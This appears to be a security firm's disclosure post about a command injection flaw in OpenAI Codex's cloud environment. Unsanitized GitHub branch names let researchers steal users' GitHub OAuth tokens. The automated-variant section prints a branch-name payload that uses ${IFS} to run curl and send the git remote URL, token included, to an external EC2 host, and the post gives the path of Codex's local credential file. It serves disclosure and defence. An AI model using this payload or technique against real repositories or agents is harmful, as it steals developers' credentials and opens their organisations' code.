BeyondTrust - Secure Remote Access and Privileged Access Management

Key Findings

BeyondTrust Phantom Labs™ has discovered a critical command injection vulnerability in OpenAI's Codex cloud environment that exposed sensitive GitHub credential data. The vulnerability exists within the task creation HTTP request, which allows an attacker to inject arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub.

Through automated techniques, this exploit can scale to compromise multiple users interacting with a shared environment or GitHub repository. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been remediated in coordination with OpenAI’s security team.

Open AI Vulnerability Chart 1
Figure 1: Codex attack path

As shown above in Figure 1, the attack path can take several directions depending on the context the attacker is operating within. We could compromise a single user through any codex product, or we could initiate the automated techniques entirely through GitHub without ever touching Codex. Additionally, after elevating access from Codex to GitHub, we could employ the automated techniques in GitHub.

Responsible Disclosure Timeline

Date

Event

December 16, 2025

Disclosure sent to OpenAI through BugCrowd.

December 22, 2025

Initial response from OpenAI. OpenAI confirmed investigation of vulnerability.

December 23, 2025

OpenAI issues hotfix for command injection vulnerability.

January 22, 2026

OpenAI issues fix for GitHub branch shell escape.

January 30, 2026

OpenAI implements additional shell escape hardening and limits GitHub token access.

February 5, 2026

OpenAI classifies the vulnerability as Critical (Priority 1). Received permission to publicly disclose.

Background

What is OpenAI Codex?

OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository.

Codex natively interfaces with GitHub, allowing developers to leverage Codex against their GitHub repositories. To perform these actions on GitHub, users must first connect their GitHub account by authorizing the Codex application through GitHub's OAuth flow, as shown below in Figure 2.

Open AI Codex Vulnerability Fig 2
Figure 2: Authorizing ChatGPT Codex Connector on the GitHub application

GitHub Integration

GitHub applications like the ChatGPT Codex Connector generate short-lived, scoped OAuth 2.0 access tokens that function on behalf of the consenting user. With the proper scopes, an application can query information about a user’s or organization’s GitHub instance, as shown below in Figure 3.

Open AI Codex Vulnerability Fix 3 2
Figure 3: Codex GitHub application pulling repository and branch information

The ChatGPT Codex GitHub application is privileged by default, as it requires access to repositories, workflows, actions, and more. Figure 4 shows the permissions granted upon application consent. These permissions become more impactful when the application is authorized within an organization’s GitHub environment, granting Codex access to private organizational resources.

Open AI Vulnerability Fig 3
Figure 4: Codex GitHub application permissions

Command Injection Vulnerability Technical Deep Dive

OpenAI Codex Web Portal: GitHub Token Compromise

In the Codex Web portal, users can submit prompts to review, modify, and perform actions against GitHub repositories and their branches (Figure 5). This is extremely powerful for developers looking to leverage large language models (LLMs) to improve their development capabilities.

Open AI Codex Vulnerability Fig 4
Figure 5: Asking Codex a question

BeyondTrust Phantom Labs began interacting with the platform and proxying all web traffic. Under the hood, when a user creates and submits a prompt against a repository and branch, the platform generates a “cloud task”, sending a POST request to https://chatgpt.com/backend-api/wham/tasks with the environment identifier, branch, and prompt text (Figure 6).

Open AI Codex Vulnerability Fig 6
Figure 6: Body of POST request to https://chatgpt.com/backend-api/wham/tasks

On the backend, Codex Web will create an environment, which spins up a container with pre-installed languages, packages, and tools. Environments can be customized with custom setup scripts, environment variables, and secrets. They, by default, have internet access during setup script execution to install dependencies, but can be configured to restrict or limit outbound access. All outbound internet access is tunneled through an HTTP/HTTPS proxy.

Once an environment is spun up, the container installs the setup scripts and clones the selected repository and branch. Upon reviewing the platform logs, we identified the container passes the GitHub OAuth token during the cloning process; however, the token was obfuscated from the web portal, shown below in Figure 7.

Open AI Codex Vulnerability Fig 7
Figure 7: Obfuscated GitHub OAuth token in log output

The obfuscated OAuth token in the container logs immediately stood out to us. Further investigation revealed that, although the container used the token in the GitHub remote configuration, the token was removed during the agent’s runtime. This was confirmed (Figure 8) when we queried the command history within the agent runtime and received no results. We suspected the container had multiple bash scripts running, one handling repository installation and a separate one handling script execution.

Open AI Codex Vulnerability Fig 8 2
Figure 8: Failure of the history command

In order to obtain the OAuth token, we needed to get execution within the bash shell where the remote configuration was set and the repository was retrieved. After exploring several unsuccessful avenues—including setup scripts and environment variables—we identified that the branch parameter in the POST request to https://chatgpt.com/backend-api/wham/tasks was reflected in the environment setup script and remote configuration (Figure 9 and Figure 10).

Open AI Codex Vulnerability Fig 9 2
Figure 9: Main branch defined in task creation POST request
Open AI Codex Vulnerability Fig 10
Figure 10: Main branch reflected in git fetch command

To verify that values passed in the branch parameter were reflected in the environment setup, we provided a payload of “-1” as the branch name. The container raised an error in the Codex environment logs, indicating a lack of input sanitization in the POST request. We then created a command injection payload to output the git remote URL and the embedded OAuth token to a file, before asking the Codex agent to read and return the file’s contents.

We used the following JSON payload to:

  • Set the branch to main

  • Append a second command to copy the output of the git remote URL and OAuth token to a file

  • Asked the Codex agent via the prompt to list the contents of that file

Open AI Codex Vulnerability Fig 11
Figure 11: Command injection embedded in branch name

When reviewing the task output in the Codex Web portal, we successfully obtained the cleartext GitHub OAuth token. An attacker can now leverage this to laterally move into GitHub.

Open AI Codex Vulnerability Fig 12
Figure 12: Retrieving the stolen token

Codex CLI, SDK, IDE GitHub Token Compromise

Upon achieving GitHub token compromise via the web portal, we were curious if this vulnerability extended to other Codex applications, including the Codex CLI, SDK, and IDE integration. We began investigating how the host-based applications authenticated and interacted with backend APIs. We discovered that the Codex application stores authentication credentials locally in the following directories:

  • Windows: %USERPROFILE%\.codex\auth.json

  • macOS / Linux: ~/.codex/auth.json

The auth.json file contains sensitive credential materials, including OpenAI API keys, ID, access and refresh tokens, as well as the associated account identifier, shown below in Figure 13. If an attacker had access to an endpoint running one of these applications, they could use the available tokens to authenticate to the Codex Cloud backend API, passing the access_token value as the Authorization header in the HTTP requests.

Open AI Codex Vulnerability Fig 13
Figure 13: Codex authentication tokens stored in auth.json

With the ability to authenticate through the compromised access token, we replicated the attack against the OpenAI Codex Web portal, demonstrated below in Figure 14.

Open AI Codex Vulnerability Fig 14
Figure 14: Replicating the Codex website attack with codex application tokens

With no user interface to review the output of our task, we began probing the backend API, ultimately identifying it was possible to retrieve a user’s task history by sending a GET request to https://chatgpt.com/backend-api/codex/tasks. Figure 15 shows the output in Postman.

Open AI Codex Vulnerability Fig 15 2
Figure 15: Discovering Codex task history backend API

With the full task history, we were able to obtain the identifier of our latest task and append it to our existing URL path, providing us with the container logs of the specific task. In the output of the task contents, we confirmed access to the GitHub access token, demonstrated below in Figure 16.

Open AI Codex Vulnerability Fig 16
Figure 16: Obtaining the GitHub OAuth token through API

Automated Token Exfiltration Through GitHub Branch Command Injection

Although we successfully compromised the GitHub access token, we wanted to increase the severity and scale of our attack. With the help of Fletcher Davis, our Director of Research, we developed an automated variant of the attack that could compromise multiple users’ GitHub tokens by tampering with the branch name of the GitHub repository.

As shown previously, the GitHub branch name was targeted in the POST request to the backend Codex API. However, with the right access to a GitHub repository, it is possible to tamper with branches, allowing an attacker to execute the command injection and exfiltration of GitHub tokens against multiple users leveraging Codex against a repository. This could allow an attacker to laterally move or escalate privileges in GitHub.

To perform this variation, an attacker needs to create a new branch or modify an existing branch. We leveraged AWS EC2 to host our external server and receive the GitHub OAuth token. Here’s the GitHub API endpoint and payload:

  • GitHub Ref Payload: refs/heads/main;curl${IFS}'ec2-51-388-32-123.compute-1.amazonaws.com/'`git${IFS}-C${IFS}/workspace/TylersTestRepo${IFS}remote${IFS}get-url${IFS}origin`;

GitHub implements several restrictions when creating and naming branches. Because our branch name is being outputted into a shell command and evaluated in a Bash context, shell metacharacters can be leveraged to break out of the expected context and execute arbitrary commands, all within GitHub’s branch naming restrictions. The key is to replace genuine spaces with the internal field separator payload of ${IFS}. Spaces are blocked by GitHub in branch names, but not ${IFS}, which can be evaluated in Bash as a space.

The payload of the GitHub branch name is shown below:

Image031
Figure 17: Creating a command injection payload through GitHub branch name

Command Injection Vulnerability Mitigations

The root cause of this vulnerability is a lack of input sanitization for container-related web requests. As AI agents become more prevalent, both organizations and vendors must prioritize agentic AI security by treating agent containers as strict security boundaries.

  • For vendors building AI agents, all user-controllable input should be sanitized before being passed to shell commands, particularly parameters sourced from external providers like GitHub. Passing user input directly into shell scripts through string interpolation should be avoided entirely in favor of parameterized commands or safe APIs. Shell metacharacters and backticks should be escaped or blocked in any input that touches a command line. External provider data formats should not be trusted as inherently safe since GitHub allows characters in branch names that are dangerous in a shell context. Token permissions and lifetimes inside agent containers should be scoped to the minimum required for the task.

  • Organizations using AI coding agents must regularly audit the permissions granted to AI applications in GitHub to enforce AI agent identity governance and least privilege. Utilizing AI security posture management may streamline this audit process. AI agents installed at the organizational level carry elevated risk, as a single compromised user token cascades across all repositories with overlapping permissions. Repositories should be monitored for unusual branch names containing shell metacharacters or Unicode space characters, and GitHub tokens should be rotated regularly with access logs reviewed for unexpected API activity.

How BeyondTrust Can Help

As AI coding agents become embedded in development workflows, organizations need visibility into how these identities interact with systems, credentials, and infrastructure.

BeyondTrust’s Identity Security Insights helps security teams uncover and understand these relationships by mapping identity access across environments, including human, non-human, and emerging AI-driven identities. By analyzing privilege, entitlement paths, and identity behavior, organizations can identify hidden risks, such as excessive access, exposed credentials, or unintended pathways that could be leveraged in attacks like those demonstrated in this research.

This approach to AI security enables teams to move beyond isolated controls and gain a clearer view of how identity-based risks (including those introduced by AI agents) can propagate across systems, helping prioritize remediation before they are exploited.

Conclusion

AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources. Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in—and the input they consume—must be treated with the same rigor as any other application security boundary. The attack surface is expanding, and the security of these environments needs to keep pace.

Acknowledgements

We appreciate OpenAI’s prompt response and collaboration in addressing these findings to help protect customers. We value the partnership and look forward to continuing to work together to advance the security of AI systems.

Explore More Research from Phantom Labs

Phantom Labs™ researchers "think like attackers" to expose privilege escalation paths and identity attack vectors, helping defenders proactively uncover misconfigurations and detect threats in complex hybrid and cloud environments.

Explore the latest research from Phantom Labs here.

About Our Authors
Tyler Jespersen Headshot 2026

Tyler Jespersen

Security Researcher

Tyler is a security researcher passionate about breaking things, blending vulnerability research with detection engineering. He's driven by the challenge of uncovering high-severity and critical vulnerabilities. To him, offensive security feels like a game, and he's happiest when he's deep in a rabbit hole, poking at something that wasn't supposed to break. He's always learning, always hunting, and always chasing the next big find.

400x400 Linkedin X Profile

Phantom Labs™

BeyondTrust

BeyondTrust Phantom Labs™ believes the best way to fully understand cybersecurity threats is to work closely with our customers and partners, conducting real world research into the attacks that matter most to them. By dissecting emerging attack methods and exploitation techniques of threat actors, as well as conducting novel research, the team’s mission is to help organizations defend against identity threats.